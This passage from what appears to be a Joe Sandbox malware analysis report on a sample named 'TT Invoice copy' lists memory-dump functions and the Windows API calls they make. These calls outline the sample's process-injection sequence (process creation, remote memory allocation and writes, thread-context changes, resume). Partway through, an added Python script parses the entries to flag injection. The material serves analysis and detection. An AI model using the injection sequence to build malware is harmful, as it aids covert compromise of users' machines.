24088 e34987 24088->24037 24092 e3488c 24090->24092 24091 e3489e 24091->24037 24092->24090 24092->24091 24093 e30d50 Wow64SetThreadContext 24092->24093 24093->24092 24132 e30e28 24094->24132 24098 e34d73 24097->24098 24100 e30ca0 ResumeThread 24098->24100 24099 e3527e 24100->24099 24103 e30ee8 WriteProcessMemory 24101->24103 24102 e350d5 24103->24102 24136 e31170 24104->24136 24110 e3488c 24109->24110 24111 e3489e 24110->24111 24112 e30d50 Wow64SetThreadContext 24110->24112 24111->24037 24112->24110 24115 e30ee8 WriteProcessMemory 24113->24115 24114 e348de 24114->24037 24115->24114 24117 e30ce0 ResumeThread 24116->24117 24119 e30d11 24117->24119 24121 e30d95 Wow64SetThreadContext 24120->24121 24123 e30ddd 24121->24123 24123->24077 24125 e30f30 WriteProcessMemory 24124->24125 24127 e30f87 24125->24127 24127->24077 24129 e31023 ReadProcessMemory 24128->24129 24131 e31067 24129->24131 24131->24086 24131->24088 24133 e30e68 VirtualAllocEx 24132->24133 24135 e30ea5 24133->24135 24135->24037 24137 e311f9 24136->24137 24137->24137 24138 e3135e CreateProcessA 24137->24138 24139 e313bb 24138->24139 24140 e6e860 24141 e6e8a6 GetCurrentProcess 24140->24141 24143 e6e8f1 24141->24143 24144 e6e8f8 GetCurrentThread 24141->24144 24143->24144 24145 e6e935 GetCurrentProcess 24144->24145 24146 e6e92e 24144->24146 24147 e6e96b GetCurrentThreadId 24145->24147 24146->24145 24149 e6e9c4 24147->24149 24193 e6c7c0 24194 e6c802 24193->24194 24195 e6c808 GetModuleHandleW 24193->24195 24194->24195 24196 e6c835 24195->24196 24181 e35678 24182 e35803 24181->24182 24184 e3569e 24181->24184 24184->24182 24185 e328c4 24184->24185 24186 e358f8 PostMessageW 24185->24186 24187 e35964 24186->24187 24187->24184 24150 e647e8 24152 e64804 24150->24152 24151 e6487e 24152->24151 24154 e649b0 24152->24154 24155 e649d5 24154->24155 24159 e64ac0 24155->24159 24163 e64aaf 24155->24163 24161 e64ae7 24159->24161 24160 e64bc4 24161->24160 24167 e64660 24161->24167 24164 e64ae7 24163->24164 24165 e64660 
CreateActCtxA 24164->24165 24166 e64bc4 24164->24166 24165->24166 24168 e65b50 CreateActCtxA 24167->24168 24170 e65c13 24168->24170 24171 e6eaa8 DuplicateHandle 24172 e6eb3e 24171->24172 24173 e6c868 24174 e6c87c 24173->24174 24176 e6c8a1 24174->24176 24177 e6c280 24174->24177 24178 e6ca48 LoadLibraryExW 24177->24178 24180 e6cac1 24178->24180 24180->24176
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 84a75c002e409e81dcc1140e8e773326adeb387274d672c58b4f215165e5a6e7
                                                                                  • Instruction ID: 29b0b2872682690d9ec913db948d78ae57372acafab4279e6163d7c65548f8a9
                                                                                  • Opcode Fuzzy Hash: 84a75c002e409e81dcc1140e8e773326adeb387274d672c58b4f215165e5a6e7
                                                                                  • Instruction Fuzzy Hash: 33E0327594DA40CFC7108F90C84C0F9BFB8AB4B342F2130A2E40AAB363DA208801EE04
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 558 e6e860-e6e8ef GetCurrentProcess 562 e6e8f1-e6e8f7 558->562 563 e6e8f8-e6e92c GetCurrentThread 558->563 562->563 564 e6e935-e6e969 GetCurrentProcess 563->564 565 e6e92e-e6e934 563->565 567 e6e972-e6e98a 564->567 568 e6e96b-e6e971 564->568 565->564 570 e6e993-e6e9c2 GetCurrentThreadId 567->570 568->567 572 e6e9c4-e6e9ca 570->572 573 e6e9cb-e6ea2d 570->573 572->573
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6E8DE
                                                                                  • GetCurrentThread.KERNEL32 ref: 00E6E91B
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00E6E958
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00E6E9B1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Current$ProcessThread
                                                                                  • String ID:
                                                                                  • API String ID: 2063062207-0
                                                                                  • Opcode ID: 08929212f68db6d0603134b29b7b75f9c583db2c5ce34ae822424bcff552d150
                                                                                  • Instruction ID: 0a1b8e808dea0e4107463cf2141c4e43a1f8947d593e8b013c78f36dd7354eca
                                                                                  • Opcode Fuzzy Hash: 08929212f68db6d0603134b29b7b75f9c583db2c5ce34ae822424bcff552d150
                                                                                  • Instruction Fuzzy Hash: A65166B49002098FDB44DFAAD548BDEBBF1EF88314F20C459E059A73A1D7749944CF65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 708 e31170-e31205 710 e31207-e31211 708->710 711 e3123e-e3125e 708->711 710->711 712 e31213-e31215 710->712 718 e31260-e3126a 711->718 719 e31297-e312c6 711->719 714 e31217-e31221 712->714 715 e31238-e3123b 712->715 716 e31223 714->716 717 e31225-e31234 714->717 715->711 716->717 717->717 720 e31236 717->720 718->719 721 e3126c-e3126e 718->721 725 e312c8-e312d2 719->725 726 e312ff-e313b9 CreateProcessA 719->726 720->715 723 e31291-e31294 721->723 724 e31270-e3127a 721->724 723->719 727 e3127e-e3128d 724->727 728 e3127c 724->728 725->726 729 e312d4-e312d6 725->729 739 e313c2-e31448 726->739 740 e313bb-e313c1 726->740 727->727 730 e3128f 727->730 728->727 731 e312f9-e312fc 729->731 732 e312d8-e312e2 729->732 730->723 731->726 734 e312e6-e312f5 732->734 735 e312e4 732->735 734->734 736 e312f7 734->736 735->734 736->731 750 e3144a-e3144e 739->750 751 e31458-e3145c 739->751 740->739 750->751 752 e31450 750->752 753 e3145e-e31462 751->753 754 e3146c-e31470 751->754 752->751 753->754 755 e31464 753->755 756 e31472-e31476 754->756 757 e31480-e31484 754->757 755->754 756->757 758 e31478 756->758 759 e31496-e3149d 757->759 760 e31486-e3148c 757->760 758->757 761 e314b4 759->761 762 e3149f-e314ae 759->762 760->759 764 e314b5 761->764 762->761 764->764
                                                                                  APIs
                                                                                  • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00E313A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: fbb06886dfc432176de561018c6a321a6973ed023ca82845fc2eb11070386d7e
                                                                                  • Instruction ID: f51a02bdece69372d4c4464b426956d2d0274452335042ac8c0ad101fa327fd3
                                                                                  • Opcode Fuzzy Hash: fbb06886dfc432176de561018c6a321a6973ed023ca82845fc2eb11070386d7e
                                                                                  • Instruction Fuzzy Hash: 35914871D002198FDF24DFA8C8457EEBBB2EF48314F1485A9E858B7250DB749985CF92
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 765 e65b45-e65c11 CreateActCtxA 767 e65c13-e65c19 765->767 768 e65c1a-e65c74 765->768 767->768 775 e65c76-e65c79 768->775 776 e65c83-e65c87 768->776 775->776 777 e65c98 776->777 778 e65c89-e65c95 776->778 780 e65c99 777->780 778->777 780->780
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E65C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 621835c3884249a115a93aa312d521ed2f68753c7ec7be194f4ea7fb5cf77ab5
                                                                                  • Instruction ID: 59813fdbba4b4c08da03cf30ea623aa74b5e2e353a812586c49e86b6a6d160de
                                                                                  • Opcode Fuzzy Hash: 621835c3884249a115a93aa312d521ed2f68753c7ec7be194f4ea7fb5cf77ab5
                                                                                  • Instruction Fuzzy Hash: 3E4102B0D00719CEDB24DFA9C844BDEBBF1BF48304F24806AD448AB255DB756985CF91
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 781 e64660-e65c11 CreateActCtxA 784 e65c13-e65c19 781->784 785 e65c1a-e65c74 781->785 784->785 792 e65c76-e65c79 785->792 793 e65c83-e65c87 785->793 792->793 794 e65c98 793->794 795 e65c89-e65c95 793->795 797 e65c99 794->797 795->794 797->797
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00E65C01
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 4b6fb3fc39835b9b1d809f71ade1b166abfda5036622bb168ffd945861e00cc8
                                                                                  • Instruction ID: 1aa6a092b9d043f722c00d6230f2d011207a9ac1d3c54dcb745d19be372c02d7
                                                                                  • Opcode Fuzzy Hash: 4b6fb3fc39835b9b1d809f71ade1b166abfda5036622bb168ffd945861e00cc8
                                                                                  • Instruction Fuzzy Hash: 3841DFB1D00719CADB24DFA9D844B9EBBB5BF48304F2480AAD408BB255DBB5A945CF90
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 798 e30ee8-e30f36 800 e30f46-e30f85 WriteProcessMemory 798->800 801 e30f38-e30f44 798->801 803 e30f87-e30f8d 800->803 804 e30f8e-e30fbe 800->804 801->800 803->804
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 00E30F78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: fe620dde93fb6b320f50dce8de94faf0a76c9a2f4f4cec80391115f5e8a1f91d
                                                                                  • Instruction ID: 7a19de76536527c7ec5fb7ab126eb5797cb2b03391751f1236d551a5558eb6b9
                                                                                  • Opcode Fuzzy Hash: fe620dde93fb6b320f50dce8de94faf0a76c9a2f4f4cec80391115f5e8a1f91d
                                                                                  • Instruction Fuzzy Hash: C52127B19003599FCB10CFA9C885BDEBFF5FF48324F108429E958A7250C7789944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 808 e30d50-e30d9b 810 e30dab-e30ddb Wow64SetThreadContext 808->810 811 e30d9d-e30da9 808->811 813 e30de4-e30e14 810->813 814 e30ddd-e30de3 810->814 811->810 814->813
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00E30DCE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 5e5d3d99fc0a2a4f2bbba0f728bc383e4f708a834415050cb0f93d666ebf80dd
                                                                                  • Instruction ID: b185983ac6bdd956646a49e221463235073db71bfcaf629d525e3d1f9062c27b
                                                                                  • Opcode Fuzzy Hash: 5e5d3d99fc0a2a4f2bbba0f728bc383e4f708a834415050cb0f93d666ebf80dd
                                                                                  • Instruction Fuzzy Hash: CE2118B1D002098FDB10DFAAC4857EEBFF4EF88324F54842AD459A7241C778A945CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 818 e30fd8-e31065 ReadProcessMemory 821 e31067-e3106d 818->821 822 e3106e-e3109e 818->822 821->822
                                                                                  APIs
                                                                                  • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00E31058
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessRead
                                                                                  • String ID:
                                                                                  • API String ID: 1726664587-0
                                                                                  • Opcode ID: 1139104147631c52eb0242ea356a123bd567d37490d7286582cc4cf406e4fbd9
                                                                                  • Instruction ID: d5a800b362e730787c531d10be54225d1dc624e876f9af5bb4a6dee77de150bc
                                                                                  • Opcode Fuzzy Hash: 1139104147631c52eb0242ea356a123bd567d37490d7286582cc4cf406e4fbd9
                                                                                  • Instruction Fuzzy Hash: C52114B1D002599FCB10DFAAC885AEEFBF5FF48324F10842AE558A7250C7789944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 826 e6eaa8-e6eb3c DuplicateHandle 827 e6eb45-e6eb62 826->827 828 e6eb3e-e6eb44 826->828 828->827
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6EB2F
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: e451a7d1160f8f99462e4d1dc14c090e9dee30c830bf25808bac9ea60adaee15
                                                                                  • Instruction ID: 9c49ec3ec67240ab32102d3f1a586b2e19288cc3f0424efc62b0154fcdaa39c0
                                                                                  • Opcode Fuzzy Hash: e451a7d1160f8f99462e4d1dc14c090e9dee30c830bf25808bac9ea60adaee15
                                                                                  • Instruction Fuzzy Hash: 1421E2B5D002089FDB10CFAAD984ADEFBF8EB48324F14801AE918A3350D374A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00E6C8A1,00000800,00000000,00000000), ref: 00E6CAB2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 41fe695b6cbd9f7f615382bf76c8a3c2bb8ffaad0a20656947bd6a8a81a5aad8
                                                                                  • Instruction ID: c91d460c69e4c7aeaa8a1718a8051693b3c9bd133df0046f84ab493083784d2d
                                                                                  • Opcode Fuzzy Hash: 41fe695b6cbd9f7f615382bf76c8a3c2bb8ffaad0a20656947bd6a8a81a5aad8
                                                                                  • Instruction Fuzzy Hash: 341103B6D002499FDB10CF9AD444AEEFBF4EB48364F14842AD559B7210C375A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00E30E96
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: d69d84a43d15ad5ca2b55e9b15e4d3085dfee141eb73f47418a95d7a1d58f9b8
                                                                                  • Instruction ID: 403adab086b31189a12162ee878f559e6df8b7de8cd15c023dc7466fd506a057
                                                                                  • Opcode Fuzzy Hash: d69d84a43d15ad5ca2b55e9b15e4d3085dfee141eb73f47418a95d7a1d58f9b8
                                                                                  • Instruction Fuzzy Hash: 521126729002499FCF10DFAAC845BDEBFF5EB88324F108819E559A7250C775A944CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: ResumeThread
                                                                                  • String ID:
                                                                                  • API String ID: 947044025-0
                                                                                  • Opcode ID: bed19a5adce77ed4d6bb7c66bc59e62532a0ddf21f79632980f345a24e86300b
                                                                                  • Instruction ID: e7ae32118dec4b2f641d31a310e11ce2988b00ad96ddf43bf59b50a19510b859
                                                                                  • Opcode Fuzzy Hash: bed19a5adce77ed4d6bb7c66bc59e62532a0ddf21f79632980f345a24e86300b
                                                                                  • Instruction Fuzzy Hash: D51125B1D002498BDB20DFAAC4497DEFBF5AB88324F208429D459A7250CB79A944CBA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 00E35955
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e30000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePost
                                                                                  • String ID:
                                                                                  • API String ID: 410705778-0
                                                                                  • Opcode ID: 555106c8b303431762206283e8392dbfa9fc030464047dd07b95da4e07fd9668
                                                                                  • Instruction ID: 1a96e0e01ad5502103e12cbedafe84783fe262207ecc1097f9963deeb76b74cc
                                                                                  • Opcode Fuzzy Hash: 555106c8b303431762206283e8392dbfa9fc030464047dd07b95da4e07fd9668
                                                                                  • Instruction Fuzzy Hash: D511DFB58006499FDB10DF9AC849BDEBBF8EB48324F10841AE568A7210C375A954CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00E6C826
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_e60000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: c8a5e7146fa393f682da151bfecbae294a9a8d971e5455c98e6c5ccb7e7110f0
                                                                                  • Instruction ID: cee6a3674b1a796894eef2407d891e1613a2d7134005ab1bdcf464d5af046e07
                                                                                  • Opcode Fuzzy Hash: c8a5e7146fa393f682da151bfecbae294a9a8d971e5455c98e6c5ccb7e7110f0
                                                                                  • Instruction Fuzzy Hash: 5B1110B6C002498FCB24DF9AD444ADEFBF4EB88324F20842AD458B7210C379A545CFA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%
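The six API entries above (DuplicateHandle, LoadLibraryExW and GetModuleHandleW in the dump at offset 00E60000; VirtualAllocEx, ResumeThread and PostMessageW in the dump at offset 00E30000) are the raw material an analyst turns into the "Injects a PE file into a foreign processes" verdict. The script below is an added example, not part of the Joe Sandbox report: it parses entries in the line format shown on this page, groups the API names by memory-dump offset, and flags a region that contains both VirtualAllocEx and ResumeThread as injection-consistent. The pairing rule is the author's own heuristic (WriteProcessMemory and CreateRemoteThread do not appear in this section, so it deliberately uses only what the page lists); the sample input is constructed from the entries above; the WM_CLOSE decode relies on the documented constant 0x0010 for PostMessageW's uMsg argument.

```python
import re
from collections import defaultdict

# Constructed input: the six function entries on this page, reduced to the lines
# the parser needs (API call line where the report has one, Source File line,
# API ID line, Uniqueness Score line as the entry terminator).
REPORT_ENTRIES = """\
• DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00E6EB2F
• Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
• API ID: DuplicateHandle
Uniqueness Score: -1.00%
• LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00E6C8A1,00000800,00000000,00000000), ref: 00E6CAB2
• Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
• API ID: LibraryLoad
Uniqueness Score: -1.00%
• VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00E30E96
• Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
• API ID: AllocVirtual
Uniqueness Score: -1.00%
• Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
• API ID: ResumeThread
Uniqueness Score: -1.00%
• PostMessageW.USER32(?,00000010,00000000,?), ref: 00E35955
• Source File: 00000000.00000002.1679807970.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
• API ID: MessagePost
Uniqueness Score: -1.00%
• GetModuleHandleW.KERNEL32(00000000), ref: 00E6C826
• Source File: 00000000.00000002.1679915347.0000000000E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E60000, based on PE: false
• API ID: HandleModule
Uniqueness Score: -1.00%
"""

API_CALL_RE = re.compile(r"^• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
API_ID_RE = re.compile(r"^• API ID: (.*)$")

# Windows message constant: PostMessageW(hWnd, 0x0010, ...) posts WM_CLOSE.
WM_CLOSE = 0x10

# Author's heuristic (assumption, not a Joe Sandbox rule): memory allocated in a
# foreign process plus a resumed thread in the same dump region reads as injection.
INJECTION_PAIR = {"VirtualAllocEx", "ResumeThread"}


def parse_entries(text):
    """Split the report text on 'Uniqueness Score' lines; per entry collect the dump
    offset, the resolved API calls (name, module, args, ref) and Joe's API ID token."""
    entries = []
    current = {"offset": None, "calls": [], "api_id": ""}
    for line in text.splitlines():
        line = line.strip()
        m = API_CALL_RE.match(line)
        if m:
            name, module, args, ref = m.groups()
            current["calls"].append({"name": name, "module": module,
                                     "args": args.split(","), "ref": ref})
            continue
        m = OFFSET_RE.search(line)
        if m and line.startswith("• Source File"):
            current["offset"] = m.group(1).upper()
            continue
        m = API_ID_RE.match(line)
        if m:
            current["api_id"] = m.group(1).strip()
            continue
        if line.startswith("Uniqueness Score"):
            entries.append(current)
            current = {"offset": None, "calls": [], "api_id": ""}
    return entries


def apis_by_region(entries):
    """Map each dump offset to the set of API names seen there. The API ID token is
    included because some entries (ResumeThread here) carry no resolved call line."""
    regions = defaultdict(set)
    for e in entries:
        names = {c["name"] for c in e["calls"]}
        if e["api_id"]:
            names.add(e["api_id"])
        regions[e["offset"]] |= names
    return regions


def injection_regions(regions):
    """Offsets whose API set contains the whole INJECTION_PAIR, sorted."""
    return sorted(off for off, names in regions.items() if INJECTION_PAIR <= names)


def wm_close_posts(entries):
    """Refs of PostMessageW calls whose uMsg argument decodes to WM_CLOSE."""
    hits = []
    for e in entries:
        for c in e["calls"]:
            if c["name"] == "PostMessageW" and len(c["args"]) > 1:
                try:
                    if int(c["args"][1], 16) == WM_CLOSE:
                        hits.append(c["ref"])
                except ValueError:  # argument shown as '?' in the report
                    pass
    return hits


if __name__ == "__main__":
    parsed = parse_entries(REPORT_ENTRIES)
    regions = apis_by_region(parsed)
    for off in sorted(regions):
        print(off, sorted(regions[off]))
    print("injection-consistent regions:", injection_regions(regions))
    print("WM_CLOSE posts at:", wm_close_posts(parsed))
```

Run against the entries on this page the script reports 00E30000 as the only injection-consistent region and 00E35955 as a PostMessageW that posts WM_CLOSE; a practitioner extending it to the full report would add the write and remote-thread APIs to the pair once they appear in the listing rather than assuming them.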

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te^q
                                                                                  • API String ID: 0-671973202
                                                                                  • Opcode ID: d8cbcd842f8f184e5ef38fb499e74d47345a6f41f7c5cf83c792c06a03ac8e02
                                                                                  • Instruction ID: c393c9d77be9e4c36b3e486a8437b6d7cdfb7740486d72f3d24dea02735eb91f
                                                                                  • Opcode Fuzzy Hash: d8cbcd842f8f184e5ef38fb499e74d47345a6f41f7c5cf83c792c06a03ac8e02
                                                                                  • Instruction Fuzzy Hash: 9F31E4B0E152088BDB08DFAAD9546AEFBF7BF89300F14902A9819BB254DB7459458F50
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 0
                                                                                  • API String ID: 0-4108050209
                                                                                  • Opcode ID: 1d1c5fbe0e2535562f462a2d1a3396bf2daa1e38dbce7df8df08e69fe1b2c0d1
                                                                                  • Instruction ID: 0694c3ec025327ff11018c72ffef09d0118da96eb144672e873aca167b6ca45a
                                                                                  • Opcode Fuzzy Hash: 1d1c5fbe0e2535562f462a2d1a3396bf2daa1e38dbce7df8df08e69fe1b2c0d1
                                                                                  • Instruction Fuzzy Hash: 58F05E74D1D298CFCB01CFA4D880BA87BB6AF07204F1445E5D4495B213C3740A49CB42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8bcb53b5038f6d0e38962ba13cc15bf9db50af8017a8734f7d19393d2342c837
                                                                                  • Instruction ID: 55f7bb4f541802391fbb9af85d12212cf646a1ffa65d15702c358aa2a5808d64
                                                                                  • Opcode Fuzzy Hash: 8bcb53b5038f6d0e38962ba13cc15bf9db50af8017a8734f7d19393d2342c837
                                                                                  • Instruction Fuzzy Hash: 05B11E70E2521ADFCB04DFA8D540ADDFBBAFF89300F109665E419AB355DB70A985CB80
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1684908289.0000000005260000.00000040.00000800.00020000.00000000.sdmp, Offset: 05260000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5260000_TT Invoice copy.jbxd
                                                                                  Similarity
                                                                                  • API ID:
